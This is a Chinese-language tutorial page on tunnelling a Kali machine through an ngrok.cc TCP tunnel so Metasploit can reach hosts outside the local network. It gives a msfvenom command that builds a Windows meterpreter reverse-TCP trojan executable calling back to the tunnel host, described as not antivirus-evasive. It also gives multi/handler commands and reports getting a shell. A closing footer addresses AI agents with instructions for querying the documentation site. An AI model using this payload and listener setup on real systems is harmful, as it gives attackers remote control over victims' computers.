# vps配置ngrok反向代理

## 1.起因：

**自己搭建的ngrok挂掉了**

![](/files/-LoVU-4q8fTZhMIn0mke)

## 2.更换[ngrok.cc](http://www.ngrok.cc)的客户端

### 2.1 开通一个免费的隧道。

![选择免费的](/files/-LoVUnBGBgOxzNjbHIW1)

### 2.2  开通你的隧道

![](/files/-LoVV6ZkdvcP2Hu3yZAI)

隧道协议选tcp，之后要用metasploit结合ngrok

隧道名称随意

端口选择只要不是服务器端口就好

本地端口选择kali 的内网地址

### 2.3管理隧道

![](/files/-LoVVE2azI-y8O6k0_-L)

下载客户端

记录好隧道id

### 2.4 kali下安装客户端测试

安装路径下执行

> root\@kali:\~# ./sunny clientid id

出现online表明成功

![](/files/-LoVVO3UyeLRO-Xnm4YI)

现在可以启用web，打开127.0.0.1:4040查看管理。需要设置apache2的端口为端口为kali内的端口，开启apache2的服务

## 3.测试metasploit结合ngrok内网穿透

### 3.1 生成木马（未免杀）

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfen*** LPORT=123** -f exe > /root/Desktop/ngrok.exe
```

### 3.2 使用Metasploit进行测试

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.200.128(Kali的Linux内网IP)
set lport 1000 (隧道的端口号)
run
```

![](/files/-LoVVoKcjVmGXdtJLVVe)

成功获取shell，不同网段。

## 4.端口选择

以下为服务端口，不可用选用

![](/files/-LoVWbr8GpJAfpqfRqdD)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wk-book.gitbook.io/wk/huan-jing-pei-zhi-2019/2019-nian/huanjing-pei-zhi---2019.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.